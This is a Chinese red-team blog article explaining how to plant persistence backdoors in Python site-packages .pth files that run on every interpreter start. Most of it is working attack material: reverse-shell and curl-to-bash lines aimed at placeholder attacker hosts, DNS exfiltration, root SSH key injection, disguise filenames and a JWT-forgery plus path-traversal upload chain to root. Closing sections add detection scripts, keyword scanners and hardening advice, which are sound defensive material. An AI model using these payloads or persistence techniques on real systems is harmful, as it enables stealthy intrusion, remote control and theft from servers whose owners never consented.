当前位置:首页>python>红队实战 | Python .pth 持久化后门:无进程、无连接、重启自动复活,杀软全程沉默

红队实战 | Python .pth 持久化后门:无进程、无连接、重启自动复活,杀软全程沉默

  • 2026-02-28 01:16:14
红队实战 | Python .pth 持久化后门:无进程、无连接、重启自动复活,杀软全程沉默

你清了 crontab,删了 webshell,杀了可疑进程,重启了服务器。

然后你的 Python 服务一启动,后门又回来了。

你甚至不知道它藏在哪。


0x00 前言

在红队渗透中,拿到服务器权限只是开始。真正考验技术的是:如何在蓝队的眼皮底下,把权限稳稳地留住。

传统的持久化手段——crontab、systemd 服务、.bashrc 注入、webshell——蓝队早就烂熟于心,EDR 和 HIDS 也都有对应的检测规则。

今天介绍一个冷门但极其实用的持久化技巧:Python .pth 文件后门

它有几个让蓝队头疼的特性:

  • ✅ 不创建新进程
  • ✅ 不监听端口
  • ✅ 不修改任何现有文件
  • ✅ 文件名伪装成合法 Python 包配置
  • ✅ 主流杀软和 EDR 不检测 .pth 文件内容
  • ✅ 服务器重启后自动复活
  • ✅ pip list 看不到,ps aux 找不到

本文面向安全研究人员和红蓝对抗从业者,所有技术仅用于授权测试环境。


0x01 原理:30秒搞懂 .pth 文件

Python 有一个 site 模块,在解释器启动时自动加载。它会扫描所有 site-packages 目录中的 .pth 文件,逐行处理:

以 # 开头     → 跳过(注释)空行          → 跳过以 import 开头 → exec() 执行 ← 就是这行,一切的关键其他内容       → 当作路径添加到 sys.path

对,你没看错。只要一行代码以 import 开头,Python 启动时就会自动执行它。

这不是漏洞,这是 Python 的官方设计。CPython 源码 Lib/site.py 中的原文:

if line.startswith(("import ""import\t")):    exec(line)continue

每次 Python 进程启动,都会触发。每次。无条件。


0x02 Windows 实战:5秒弹计算器

先在本地验证一下这个机制。

第一步:找到你的 site-packages 目录

python -c "import site; print(site.getsitepackages())"

输出类似:

['C:\\Python311''C:\\Python311\\Lib\\site-packages']

第二步:写入 .pth 文件

打开 CMD(管理员),一行命令:

echo import os; os.system("calc.exe") > C:\Python311\Lib\site-packages\setuptools-compat.pth

⚠️ 注意文件名:setuptools-compat.pth,看起来像是 setuptools 的兼容性配置。蓝队扫一眼目录,大概率不会注意到。

第三步:触发

随便运行一个 Python 命令:

python -c "print('hello')"

计算器弹出来了。

甚至 pip listpip install xxx 也会触发——因为 pip 本身就是 Python 脚本。

第四步:清理(测试完记得删)

del C:\Python311\Lib\site-packages\setuptools-compat.pth

0x03 Linux 实战:反弹 Shell

在实际渗透场景中,目标通常是 Linux 服务器。

场景设定

  • 目标:Ubuntu 服务器,运行 Flask/Django/FastAPI 等 Python Web 服务
  • 已获取:root 权限(或对 site-packages 有写权限的用户)
  • 目标:留一个重启后自动复活的持久化后门

第一步:确认 site-packages 路径

python3 -c "import site; print(site.getsitepackages())"# 输出: ['/usr/lib/python3/dist-packages', '/usr/lib/python3.12/dist-packages']

第二步:写入后门

echo'import os; os.system("bash -c \"bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1\" &")' > /usr/lib/python3/dist-packages/distutils-compat.pth

文件名选择 distutils-compat.pth,混在一堆合法的 .pth 文件中间。

第三步:等待触发

以下任何一种情况都会触发后门:

触发场景
说明
Python Web 服务重启
PM2/Supervisor/systemd 管理的 Flask/Django 等
pip 命令执行
pip install
pip listpip freeze
cron 中的 Python 脚本
定时任务执行 Python 脚本
管理员手动运行 Python
python3 xxx.py
服务器重启
systemd 自动拉起 Python 服务

在攻击机上监听:

nc -lvnp 4444

目标服务器上任何 Python 进程启动,shell 就回来了。


0x04 进阶:让后门更隐蔽

基础版的反弹 shell 太粗暴了。实战中需要更精细的控制。

4.1 条件触发:只在特定时间执行

import os, time; exec("h=time.localtime().tm_hour\nif 2<=h<=4: os.system('curl http://ATTACKER/beacon.sh|bash &')")

只在凌晨 2-4 点触发,降低被发现的概率。白天蓝队排查时完全静默。

4.2 单次触发 + 自删除

import os; exec("p='/usr/lib/python3/dist-packages/distutils-compat.pth'\nos.system('curl http://ATTACKER/payload.sh|bash &')\nos.remove(p)")

执行一次后自动删除 .pth 文件。适合只需要回连一次下载更高级植入物的场景。

4.3 DNS 外带数据(无直接连接)

import os; os.system("nslookup $(whoami).$(hostname).attacker.com &")

不建立 TCP 连接,通过 DNS 查询外带信息。绕过出站流量监控。

4.4 写入 SSH 公钥(无需回连)

import os; exec("d='/root/.ssh'\nos.makedirs(d,exist_ok=True)\nf=open(d+'/authorized_keys','a')\nf.write('\\nssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAI... attacker@pwn\\n')\nf.close()\nos.chmod(d+'/authorized_keys',0o600)")

不需要反弹 shell,直接写入 SSH 公钥。之后用 SSH 正常登录,流量完全加密,和管理员的正常 SSH 登录无法区分。

4.5 伪装文件名参考

好的伪装名应该看起来像合法的 Python 包配置:

distutils-precedence.pth      ← 真实存在的文件名setuptools-compat.pth          ← 看起来像 setuptools 的兼容层pip-system-certs.pth           ← 看起来像证书配置_virtualenv.pth                ← 看起来像 virtualenv 的配置certifi-system-store.pth       ← 看起来像证书存储配置

0x05 真实案例:文件上传 → .pth 注入 → RCE

这不是假设场景。以下是我在一次真实代码审计中发现的完整攻击链。

目标系统

一个 Flask Web 应用,提供文件上传功能(头像上传)。

漏洞链

漏洞 1:JWT 密钥硬编码

# config.pyJWT_SECRET = os.environ.get('JWT_SECRET''your-jwt-secret-key-change-in-production')

服务器没有设置环境变量,使用了默认的弱密钥。攻击者可以伪造任意 JWT。

漏洞 2:文件上传无扩展名校验

@app.route('/upload/avatar', methods=['POST'])@verify_tokendefupload_avatar():    openid = request.user['openid']  # 来自 JWT    ext = file.filename.rsplit('.'1)[-1]  # 无白名单校验    filename = f"{openid}-{int(time.time())}.{ext}"    filepath = os.path.join(AVATARS_DIR, filename)    file.save(filepath)

没有限制上传文件的扩展名,.pth 文件可以直接上传。

漏洞 3:路径遍历

JWT 中的 openid 字段直接拼入文件路径。Python 的 os.path.join() 有一个特性:当后续参数是绝对路径时,会完全忽略前面的路径

os.path.join('/opt/app/uploads/avatars''/usr/lib/python3/dist-packages/evil')# 结果: /usr/lib/python3/dist-packages/evil# AVATARS_DIR 被完全忽略了!

完整攻击链

Step 1: 伪造 JWT        openid = "/usr/lib/python3/dist-packages/backdoor"Step 2: 上传 evil.pth        文件内容: import os; os.system("curl http://attacker.com/shell.sh|bash &")Step 3: 文件落地        filepath = os.path.join(AVATARS_DIR, "/usr/lib/python3/dist-packages/backdoor-1740000000.pth")        实际路径 = /usr/lib/python3/dist-packages/backdoor-1740000000.pthStep 4: 等待任意 Python 进程重启        PM2 自动重启 / cron 任务 / 管理员操作Step 5: .pth 文件被 site.py 自动执行 → 反弹 shell → root 权限

三个中低危漏洞组合,直接打穿到 root shell。


0x06 为什么杀软检测不到

对比一下 .pth 后门和传统后门的检测难度:

检测维度
Webshell
Crontab
.bashrc
.pth 后门
文件扩展名可疑
✅ .php/.jsp
❌ .pth 看起来像配置
文件内容特征
✅ eval/system
✅ 定时任务格式
✅ 命令格式
❌ 一行 import 语句
常见检测规则覆盖
❌ 几乎没有
文件位置可疑
✅ web目录
✅ /var/spool/cron
✅ 用户目录
❌ 混在合法包中间
进程行为异常
✅ web进程执行命令
✅ cron子进程
✅ shell子进程
❌ Python自身行为
网络连接异常
取决于载荷
取决于载荷
可控(DNS外带等)

.pth 后门的执行是 Python 解释器的正常行为(site.py 的设计功能),不是漏洞利用。从进程树看,就是 Python 启动时的正常初始化流程。

主流 HIDS/EDR 的检测规则通常覆盖:

  • /etc/crontab/var/spool/cron/
  • /etc/init.d/、systemd 服务文件
  • .bashrc.profile.bash_profile
  • Web 目录下的脚本文件
  • /etc/ld.so.preload(LD_PRELOAD 劫持)

但几乎没有产品会扫描 site-packages/*.pth 文件的内容。


0x07 蓝队检测:如何发现 .pth 后门

既然讲了攻,也要讲防。

7.1 一键扫描脚本

# 扫描所有 site-packages 中包含可疑关键词的 .pth 文件find / -name "*.pth" -path "*/site-packages/*" 2>/dev/null | whileread f; doif grep -qiE "(os\.system|subprocess|os\.popen|socket|exec\(|eval\(|urllib|requests\.|curl|wget|bash|/bin/sh|reverse|/dev/tcp)""$f"thenecho"[!] 可疑: $f"    cat "$f"echo"---"fidone

Windows 版本(PowerShell):

Get-ChildItem -Path C:\ -Recurse -Filter "*.pth" -ErrorAction SilentlyContinue |  Where-Object { $_.FullName -like "*site-packages*" } |  ForEach-Object {    $content = Get-Content $_.FullName -Raw    if ($content -match "os\.system|subprocess|os\.popen|socket|exec\(|eval\(|calc|cmd|powershell") {      Write-Host "[!] 可疑: $($_.FullName)" -ForegroundColor Red      Write-Host $content      Write-Host "---"    }  }

7.2 基线对比

最有效的检测方法是建立 .pth 文件基线:

# 建立基线(在确认安全的环境中执行)find / -name "*.pth" -path "*/site-packages/*" 2>/dev/null | sort > /root/.pth_baseline.txt# 定期对比find / -name "*.pth" -path "*/site-packages/*" 2>/dev/null | sort | diff /root/.pth_baseline.txt -

任何新增的 .pth 文件都值得关注。

7.3 文件完整性监控

# 使用 inotifywait 实时监控(需要安装 inotify-tools)inotifywait -m -r -e create,modify,delete \  /usr/lib/python3/dist-packages/ \  /usr/local/lib/python3.*/dist-packages/ \  --include '\.pth$' \  --format '%T %w%f %e' --timefmt '%Y-%m-%d %H:%M:%S'

7.4 HIDS 规则建议

如果你是安全运营,建议在 HIDS 中添加以下规则:

# 监控 site-packages 目录下 .pth 文件的创建和修改-rule_name:"Python .pth 文件变更"severity:highfile_monitor:paths:-/usr/lib/python*/dist-packages/*.pth-/usr/local/lib/python*/dist-packages/*.pth-/home/*/.local/lib/python*/site-packages/*.pthevents:[create,modify]alert:"检测到 site-packages 中 .pth 文件变更,可能为持久化后门"

0x08 防御加固

8.1 文件系统权限(最重要)

# 确保 site-packages 目录只有 root 可写chmod 755 /usr/lib/python3/dist-packageschown root:root /usr/lib/python3/dist-packages# 关键:不要以 root 运行 Python 服务!# 创建专用用户useradd -r -s /sbin/nologin -d /opt/app appuser# 以 appuser 身份运行服务su -s /bin/bash -c "python3 app.py" appuser

如果 Python 服务不以 root 运行,攻击者即使有文件写入漏洞,也无法写入 root 所有的 site-packages 目录。

8.2 虚拟环境隔离

# 使用 venv,每个应用独立的 site-packagespython3 -m venv /opt/app/venvsource /opt/app/venv/bin/activate# venv 的 site-packages 与系统隔离# 攻击者需要知道 venv 的精确路径才能投放 .pth 文件

8.3 应用层防御(针对文件上传场景)

import os# 1. 文件扩展名白名单ALLOWED_EXTENSIONS = {'jpg''jpeg''png''gif''webp'}# 2. 路径边界检查defsafe_save(file, base_dir, filename):    filepath = os.path.join(base_dir, filename)# 用 realpath 解析所有符号链接和 ../     real_base = os.path.realpath(base_dir)    real_path = os.path.realpath(filepath)ifnot real_path.startswith(real_base + os.sep):raise ValueError("路径遍历攻击")    file.save(real_path)# 3. 用户输入不要直接拼入文件路径# ❌ 错误filename = f"{user_input}-{timestamp}.{ext}"# ✅ 正确import uuidfilename = f"{uuid.uuid4().hex}.{ext}"

0x09 .pth 后门 vs 其他持久化手段

维度
.pth 后门
Crontab
Systemd 服务
LD_PRELOAD
Webshell
隐蔽性
⭐⭐⭐⭐⭐
⭐⭐
⭐⭐
⭐⭐⭐⭐
⭐⭐
可靠性
⭐⭐⭐⭐
⭐⭐⭐⭐⭐
⭐⭐⭐⭐⭐
⭐⭐⭐
⭐⭐⭐
前提条件
目标有Python
root权限
root权限
Web服务
触发方式
Python启动
定时
开机自启
任意进程启动
HTTP请求
杀软检测率
极低
适用场景
Python服务器
通用
通用
通用Linux
Web服务器

.pth 后门的最大优势是隐蔽性,最大限制是目标必须有 Python 环境。但考虑到现在大量服务器都运行 Python 应用(Flask、Django、FastAPI、Celery、Airflow...),这个限制其实不算大。


0x0A 注意事项与踩坑点

踩坑 1:必须写在一行

# ❌ 错误 — 不会执行 os.systemimport osos.system("calc.exe")# ✅ 正确 — 用分号连接在同一行import os; os.system("calc.exe")

site.py 逐行独立判断,只有以 import 开头的那一行会被 exec()。第二行 os.system(...) 不以 import 开头,会被当作路径处理,不会执行。

踩坑 2:Windows echo 的引号问题

:: ❌ CMD 中双引号会被吃掉echo import os; os.system("calc.exe") > evil.pth:: 文件实际内容可能变成: import os; os.system(calc.exe):: 解决方案:用 PowerShell 或 Python 写入

PowerShell 写入更可靠:

Set-Content -Path "C:\Python311\Lib\site-packages\evil.pth" -Value 'import os; os.system("calc.exe")' -NoNewline

或者用 Python 自己写:

python -c "open(r'C:\Python311\Lib\site-packages\evil.pth','w').write('import os; os.system(\"calc.exe\")')"

踩坑 3:UTF-8 BOM 头

Windows 记事本保存的文件可能带 BOM(EF BB BF),导致第一行变成 \xefimport os,不再匹配 startswith("import ")

用 VS Code 保存时选择 "UTF-8"(不带 BOM)。

踩坑 4:venv 环境

如果目标 Python 运行在 venv 中,系统级 site-packages 中的 .pth 文件可能不会被加载(取决于 pyvenv.cfg 中 include-system-site-packages 的设置)。

需要把 .pth 文件放到 venv 自己的 site-packages 中:

# 找到 venv 的 site-packages/opt/app/venv/lib/python3.12/site-packages/

踩坑 5:-S 参数

python -S app.py  # 跳过 site.py,.pth 文件不会被处理

如果目标使用 -S 参数启动 Python,.pth 后门无效。但实际生产环境中几乎没有人用 -S,因为它会导致第三方包无法导入。


0x0B 总结

.pth 文件后门是一个被严重低估的持久化技术。它利用的不是漏洞,而是 Python 的设计特性——site.py 模块在启动时自动执行 .pth 文件中以 import 开头的行。

对红队来说,它是一个隐蔽性极高的权限维持手段,特别适合 Python 技术栈的目标环境。

对蓝队来说,现在就应该把 site-packages/*.pth 加入你的安全基线和文件完整性监控中。

记住:你的 site-packages 目录里,可能藏着你从未审计过的代码,而它们每次 Python 启动都在执行。


免责声明:本文所述技术仅用于授权安全测试和安全研究。未经授权对他人系统进行渗透测试属于违法行为。请遵守相关法律法规。


觉得有用?转发给你的安全团队和小伙伴。

关注公众号,获取更多实战攻防技术。

Best wishes ~

最新文章

随机文章

基本 文件 流程 错误 SQL 调试
  1. 请求信息 : 2026-02-28 09:02:43 HTTP/2.0 GET : https://f.mffb.com.cn/a/477517.html
  2. 运行时间 : 0.110771s [ 吞吐率:9.03req/s ] 内存消耗:4,793.54kb 文件加载:140
  3. 缓存信息 : 0 reads,0 writes
  4. 会话信息 : SESSION_ID=96c24505bbeb57ca052d2495fbfe7bc6
  1. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/public/index.php ( 0.79 KB )
  2. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/autoload.php ( 0.17 KB )
  3. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_real.php ( 2.49 KB )
  4. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/platform_check.php ( 0.90 KB )
  5. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/ClassLoader.php ( 14.03 KB )
  6. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/composer/autoload_static.php ( 4.90 KB )
  7. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper.php ( 8.34 KB )
  8. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/helper.php ( 2.19 KB )
  9. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/helper.php ( 1.47 KB )
  10. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/stubs/load_stubs.php ( 0.16 KB )
  11. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Exception.php ( 1.69 KB )
  12. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Facade.php ( 2.71 KB )
  13. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/deprecation-contracts/function.php ( 0.99 KB )
  14. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap.php ( 8.26 KB )
  15. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/polyfill-mbstring/bootstrap80.php ( 9.78 KB )
  16. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/Resources/functions/dump.php ( 1.49 KB )
  17. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-dumper/src/helper.php ( 0.18 KB )
  18. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/symfony/var-dumper/VarDumper.php ( 4.30 KB )
  19. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/App.php ( 15.30 KB )
  20. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-container/src/Container.php ( 15.76 KB )
  21. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/container/src/ContainerInterface.php ( 1.02 KB )
  22. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/provider.php ( 0.19 KB )
  23. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Http.php ( 6.04 KB )
  24. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Str.php ( 7.29 KB )
  25. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Env.php ( 4.68 KB )
  26. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/common.php ( 0.03 KB )
  27. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/helper.php ( 18.78 KB )
  28. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Config.php ( 5.54 KB )
  29. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/app.php ( 0.95 KB )
  30. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cache.php ( 0.78 KB )
  31. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/console.php ( 0.23 KB )
  32. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/cookie.php ( 0.56 KB )
  33. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/database.php ( 2.48 KB )
  34. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Env.php ( 1.67 KB )
  35. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/filesystem.php ( 0.61 KB )
  36. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/lang.php ( 0.91 KB )
  37. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/log.php ( 1.35 KB )
  38. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/middleware.php ( 0.19 KB )
  39. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/route.php ( 1.89 KB )
  40. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/session.php ( 0.57 KB )
  41. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/trace.php ( 0.34 KB )
  42. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/config/view.php ( 0.82 KB )
  43. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/event.php ( 0.25 KB )
  44. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Event.php ( 7.67 KB )
  45. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/service.php ( 0.13 KB )
  46. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/AppService.php ( 0.26 KB )
  47. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Service.php ( 1.64 KB )
  48. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Lang.php ( 7.35 KB )
  49. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/lang/zh-cn.php ( 13.70 KB )
  50. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/Error.php ( 3.31 KB )
  51. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/RegisterService.php ( 1.33 KB )
  52. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/services.php ( 0.14 KB )
  53. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/PaginatorService.php ( 1.52 KB )
  54. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ValidateService.php ( 0.99 KB )
  55. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/service/ModelService.php ( 2.04 KB )
  56. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/Service.php ( 0.77 KB )
  57. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Middleware.php ( 6.72 KB )
  58. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/initializer/BootService.php ( 0.77 KB )
  59. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Paginator.php ( 11.86 KB )
  60. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-validate/src/Validate.php ( 63.20 KB )
  61. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/Model.php ( 23.55 KB )
  62. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Attribute.php ( 21.05 KB )
  63. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/AutoWriteData.php ( 4.21 KB )
  64. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/Conversion.php ( 6.44 KB )
  65. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/DbConnect.php ( 5.16 KB )
  66. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/ModelEvent.php ( 2.33 KB )
  67. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/concern/RelationShip.php ( 28.29 KB )
  68. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Arrayable.php ( 0.09 KB )
  69. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/contract/Jsonable.php ( 0.13 KB )
  70. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/model/contract/Modelable.php ( 0.09 KB )
  71. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Db.php ( 2.88 KB )
  72. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/DbManager.php ( 8.52 KB )
  73. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Log.php ( 6.28 KB )
  74. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Manager.php ( 3.92 KB )
  75. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerTrait.php ( 2.69 KB )
  76. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/log/src/LoggerInterface.php ( 2.71 KB )
  77. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Cache.php ( 4.92 KB )
  78. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/psr/simple-cache/src/CacheInterface.php ( 4.71 KB )
  79. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-helper/src/helper/Arr.php ( 16.63 KB )
  80. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/driver/File.php ( 7.84 KB )
  81. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/cache/Driver.php ( 9.03 KB )
  82. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/CacheHandlerInterface.php ( 1.99 KB )
  83. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/Request.php ( 0.09 KB )
  84. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Request.php ( 55.78 KB )
  85. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/middleware.php ( 0.25 KB )
  86. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Pipeline.php ( 2.61 KB )
  87. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-trace/src/TraceDebug.php ( 3.40 KB )
  88. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/middleware/SessionInit.php ( 1.94 KB )
  89. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Session.php ( 1.80 KB )
  90. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/driver/File.php ( 6.27 KB )
  91. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/contract/SessionHandlerInterface.php ( 0.87 KB )
  92. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/session/Store.php ( 7.12 KB )
  93. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/Route.php ( 23.73 KB )
  94. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleName.php ( 5.75 KB )
  95. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Domain.php ( 2.53 KB )
  96. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleGroup.php ( 22.43 KB )
  97. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Rule.php ( 26.95 KB )
  98. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/RuleItem.php ( 9.78 KB )
  99. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/route/app.php ( 1.72 KB )
  100. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/facade/Route.php ( 4.70 KB )
  101. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/dispatch/Controller.php ( 4.74 KB )
  102. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/framework/src/think/route/Dispatch.php ( 10.44 KB )
  103. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/controller/Index.php ( 4.81 KB )
  104. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/app/BaseController.php ( 2.05 KB )
  105. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/facade/Db.php ( 0.93 KB )
  106. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/connector/Mysql.php ( 5.44 KB )
  107. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/PDOConnection.php ( 52.47 KB )
  108. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Connection.php ( 8.39 KB )
  109. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/ConnectionInterface.php ( 4.57 KB )
  110. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/builder/Mysql.php ( 16.58 KB )
  111. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Builder.php ( 24.06 KB )
  112. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseBuilder.php ( 27.50 KB )
  113. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/Query.php ( 15.71 KB )
  114. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/BaseQuery.php ( 45.13 KB )
  115. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/TimeFieldQuery.php ( 7.43 KB )
  116. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/AggregateQuery.php ( 3.26 KB )
  117. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ModelRelationQuery.php ( 20.07 KB )
  118. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ParamsBind.php ( 3.66 KB )
  119. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/ResultOperation.php ( 7.01 KB )
  120. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/WhereQuery.php ( 19.37 KB )
  121. /yingpanguazai/ssd/ssd1/www/f.mffb.com.cn/vendor/topthink/think-orm/src/db/concern/JoinAndViewQuery.php ( 7.11 KB )
